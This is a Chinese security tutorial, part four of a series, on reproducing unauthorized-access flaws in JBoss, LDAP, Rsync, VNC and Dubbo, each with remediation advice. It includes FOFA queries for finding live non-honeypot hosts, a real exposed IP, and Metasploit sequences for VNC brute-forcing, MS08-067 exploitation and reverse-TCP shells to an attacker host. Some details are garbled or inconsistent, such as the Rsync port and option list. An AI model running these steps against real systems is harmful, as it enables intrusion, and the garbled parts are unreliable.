三十种未授权访问漏洞复现 合集( 四 )

news2025/1/20 18:21:47

 未授权访问漏洞介绍

        未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历
        目前主要存在未授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTPGitLab, Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
        未授权访问漏洞的复现思路:
        1.使用靶场进行漏洞复现:(1)vulhub(2)本地搭建靶场
        2.使用漏洞扫描工具进行扫描(1)github-功能受限(2)Python-定制化的完成漏洞扫描的利用

目录

十六:JBoss未授权访问漏洞

十七:Ldap未授权访问漏洞

十八:Rsync未授权访问漏洞

十九:VNC未授权访问漏洞

二十:Dubbo未授权访问漏洞 


十六:JBoss未授权访问漏洞

》》》漏洞简介《《《

        JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

》》》漏洞复现《《《

fofa搜索语句:title="'Welcome to JBoss"

拼接以下路径且无需认证直接进入控制页面..

#拼接路径
http://ip:port/jmx-console/

#eg
http://177.67.128.116//jmx-console/

》》》漏洞修复建议《《《

1.jboss.deployment部署shell

2.进行JMX Console 安全配置。


十七:Ldap未授权访问漏洞

》》》漏洞简介《《《

LDAP中文全称为:轻型目录访问协议(Lightweight DirectoryAccess Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证,导致未授权访问。

》》》漏洞复现《《《

使用以下Fofa语法搜索使用Idap服务的产品.…..并通过Ldapadmin可视化工具做连接验证..

#fofa语法
port="389"

#Ldapadmin工具

http://www.ldapadmin.org/download/index.html

https://sourceforge.net/projects/ldapadmin/

启动工具并测试存在未授权的LDAP服务..成功如下.

》》》漏洞修复建议《《《

1.修改ldap的acl,不允许匿名访问。
2.根据业务设置ldap访问白名单或黑名单


十八:Rsync未授权访问漏洞

》》》漏洞简介《《《

Rsync未授权访问带来的危害主要有两个
        1.造成了严重的信息泄露;
        2.上传脚本后门文件,远程命令执行;

Rsync 是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync的默认端口为837 且默认配置文件路径在/etc/rsync.conf

# 配置文件
motd file -> motd文件位置
log file -> 日志文件位置文件位置
path-> 默认路径位置路径位置
use chroot->是否限定在该目录下定在该目录下该目录下,如果为true就限定为模块默认目录
read only->只读配置
list=true ->是否可以列出模块名以列出模块名出模块名
uid =root -> 传输使用的用户名
gid =root-> 传输使用的用户组
auth users ->认证用户名secrets file=/etc/rsyncd.passwd ->指定密码文件密码文件,密码文件/etc/rsyncd.passwd的内容格式为:username:password

hosts allow=192.168.0.101 ->设置可以允许访问的主机

hosts deny 禁止的主机*表任意任意

# 基本命令
Rsync I-avrlptgoDl I-e sshlJuser@hostIP:/dirl [/local/path]
-v 观察模式,输出更多资讯
-9与 -v 相反,仅显示错误信息
递归复制,针对目录-r
仅更新较新的文件-U
复制连接的属性
复制时保持属性不变
保存原有群组
保存原有拥有人
保存原有装置属性
保存原有时间属性
-J忽略更新时间属性,本档案比对较快
-z 加上压缩参数
-e 使用协议通道,例如ssh,-essh
-a 相对于-rlptgoD,所以-a最常用

》》》漏洞复现《《《

fofa语法:(port="873")&&(is_honeypot=false && is_fraud=false)

可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测..

#nmap命令
nmap -p873--script rsync-list-modules ipaddress


# Metasploit模块

auxiliary/scanner/rsync/modules list

》》》漏洞修复建议《《《

  1. 隐藏掉 module 信息:修改配置文件 list =false。
  2. 权限控制:不需要写入权限的 module 的设置为只读 Read only = true;
  3. 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问;
  4. 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务;
  5. 数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh;


十九:VNC未授权访问漏洞

》》》漏洞简介《《《

VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

》》》漏洞复现《《《

fofa语句:(port="5900")&&(is_honeypot=false && is_fraud=false)

可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc_none_auth

msf6 auxiliary(scanner/vnc/vnc_none_auth)>show options

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set rhosts 192.168.168.200-254

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set threads 100

msf6 auxiliary(scanner/vnc/vnc_none_auth)>run


# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login)>192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set rhosts 192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set blank_passwords true //弱密码爆破
msf6 auxiliary(scanner/vnc/vnc_login)>run


# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi)>use exploit/windows/smb/ms08_067 netapi
msf6 exploit(windows/smb/ms08_067_netapi)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi)>set rhosts 192.168.168.228

msf6 exploit(windows/smb/ms08_067_netapi)>set lhost 192.168.168.102

msf6 exploit(windows/smb/ms08_067_netapi)>set target 34

msf6 exploit(windows/smb/ms08_067_netapi)>exploit

获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6>use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp

msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

VNC链接验证...

vncviewer ipaddress

》》》漏洞修复建议《《《

  1. 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。
  2. 以最小普通权限身份运行操作系统。

二十:Dubbo未授权访问漏洞

》》》漏洞简介《《《

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

》》》漏洞复现《《《

fofa语句:(app="APACHE-dubbo")&&(is_honeypot=false && is_fraud=false)

使用Telnet程序直接进行链接测试…

telent IP port

》》》漏洞修复建议《《《

1.配置dubbo认证。
2.设置防火墙策略;
如果正常业务中dubbo 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP 来访问服务。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1978691.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

日志系统——整体框架

日志等级模块: 该模块描述了日志消息的各种等级debug,info,warn,error,fatal,off(off为最高等级,屏蔽一切日志消息),并提供描述日志等级的方法 日志消息模块: 该模块负责构建日志消息对象,此对象管理着一条日志中的各项…

【Python网络爬虫案例】python爬虫之爬取豆瓣电影信息

🔗 运行环境:PYTHON 🚩 撰写作者:左手の明天 🥇 精选专栏:《python》 🔥 推荐专栏:《算法研究》 #### 防伪水印——左手の明天 #### 💗 大家好🤗&#x1f91…

【C语言】计算四则运算,中缀表达式转换为后缀表达式

C语言编程—中缀表达式转换为后缀表达式 思路: 中缀转后缀保存结果栈:stack,保存数据和-*/ 操作符栈:op_stack,保存-*/() 场景一:遇到数据,直接入栈stack 场景二:遇到"(&qu…

海康笔试题

1. 2. 块设备:磁盘设备驱动、SD设备驱动 字符设备:终端设备驱动 网络设备:网络设备驱动 (1)linux操作系统驱动程序分为三大类:字符设备驱动、快设备驱动和网络设备驱动 (2)字符设…

2024 年华数杯全国大学生数学建模竞赛C 题 老外游中国 完整思路 源代码 模型结果(仅供学习)

最近,“city 不 city”这一网络流行语在外国网红的推动下备受关注。随着我国过境免签政策的落实,越来越多外国游客来到中国,通过网络平台展示他们在华旅行的见闻,这不仅推动了中国旅游业的发展,更是在国际舞台上展现了…

基于X86+FPGA助力实现电力系统的智能监测与高效管理

电力监控 信迈提供基于Intel平台、Xilinx平台、Rockchip平台、NXP平台、飞腾平台的Mini-ITX主板、Micro-ATX主板、ATX主板、嵌入式准系统/工业整机等计算机硬件。产品算力强大,支持高速存储,提供丰富串口、USB、LAN、PCIe扩展接口、显示接口等I/O接口&am…

【python】数据类型之列表类型(上)

本篇文章将讲解列表类型。 列表(list),是一个有序且可变的容器,在里面可以存放多个不同类型的元素。 列表中的元素之间用逗号(英文中的逗号)相隔。 1、定义: 例如: user_list[]…

stl容器 vector的基本操作

目录 1.vector构造 1.1默认构造函数 1.2 fill 填充构造函数 ​编辑 1.3 范围构造函数(Range Constructor) 1.4拷贝构造函数 2.initializer_list初始化vector 3.迭代器 4.常用的几个成员 4.1 size()统计当前有效字符个数 4.2 capacity ve…

青甘环线游记|day(2)|西宁、青海湖

坐动车 早上7:30醒来,在8:00左右起床,下楼吃兰州拉面。面煮的很好吃,就是还是不是很适应。看到8元的牛肉面感觉很震惊,没想到是面8元,牛肉另加,10元。 坐上动车前往西宁,12点左右到了。虽然在…

PXE实现自动安装部署操作系统

PXE(Preboot eXecution Environment)是一种在计算机启动时使用网络接口从远程服务器获取操作系统安装和启动信息的技术。通过PXE,计算机可以从局域网中的PXE服务器上下载操作系统安装文件,并进行自动化的操作系统部署或故障排除。…

25考研数据结构复习·7.4B树和B+树7.5散列(Hash)表

目录 B树和B树 B树 m阶B树的核心特性 B树的插入 B树的删除 非终端结点关键字 终端结点关键字 低于下限 B树 散列(Hash)表 基本概念 散列函数的构造 👩‍💻 除留余数法 直接定址法 数字分析法 平方取中法 处理冲突…

动手学深度学习V2每日笔记(池化层)

本文主要参考沐神的视频教程 https://www.bilibili.com/video/BV1EV411j7nX/spm_id_from333.999.0.0&vd_sourcec7bfc6ce0ea0cbe43aa288ba2713e56d 文档教程 https://zh-v2.d2l.ai/ 本文的主要内容对沐神提供的代码中个人不太理解的内容进行笔记记录,内容不会特别…

Linux基础环境开发工具(二)

目录 一、前言二、make和makefile工具1.快速认识一下2.依赖关系和依赖方法3.执行原理 三、Git工具1.快速认识一下2.git的使用 四、gdb工具1.快速认识一下2、类比Windows使用 一、前言 在开发工具第一篇中我们介绍了yum,vim,gcc/g编译器这几种工具&#…

C++ 继承 派生类的拷贝构造

继承 派生类的拷贝构造构造顺序拷贝构造 引例1: 当子类,不自实现拷贝构造时,默认调用父类的拷贝构造引例2: 子类自实现拷贝构造,不做特殊处理时,只会调用父类的构造器.引例3: 显示的调用父类的拷贝构造器。案例: 内嵌函数的拷贝构造 引例1 :当内嵌子对象,子类不自实现拷贝构造时…

Netty二

Netty 问题分析 bootstrap serverBootstrap pipeline和channelPipeline EventLoopGroup和实现类NioEventLoopGroup

U2net论文复现-简单解读-以及奇奇怪怪的改进-测试roc以及pr

论文地址:U2net论文地址 显著性目标检测: Salient ObjectDetetion(SOD)显著性目标检测,就是要把图片中最显著的物体分割出来,所以是二分类任务,只需要背景和前景。 1、Introduce 1.1、目前存在的2个挑战&#xff1…

Day-11 员工管理案例 增删改查、配置文件

SpringBootWeb案例 前面我们已经实现了员工信息的条件分页查询以及删除操作。 关于员工管理的功能,还有两个需要实现: 新增员工修改员工 首先我们先完成"新增员工"的功能开发,再完成"修改员工"的功能开发。而在"新…

Midjourney、Sora和硅谷机密-《分析模式》漫谈15

DDD领域驱动设计批评文集 做强化自测题获得“软件方法建模师”称号 《软件方法》各章合集 “Analysis Patterns”的Preface(前言)有这么一句: Kent Beck, Ward Cunningham, and Jim Coplein encouraged me to get involved with the commu…

《Advanced RAG》-02-揭开 PDF 解析的神秘面纱

摘要 PDF 文件是非结构化文档的代表,但从 PDF 文档中提取信息是一个具有挑战性的过程。 PDF 文件由一系列指令组成,这些指令指示 PDF 阅读器或打印机在屏幕或纸张上显示符号的位置和方式。与 HTML 和 docx 等文件格式不同,后者使用标记来组织…

8月2日,贪心-买卖股票的最佳时期

大家好呀,今天我们看两道用贪心算法解的两道题,150道经典面试题中的买卖股票的最佳时期1和2。 1.买卖股票的最佳时期1 . - 力扣(LeetCode) 思路 对于这题,我们其实很容易想出暴力解,那就是从后往前找值&…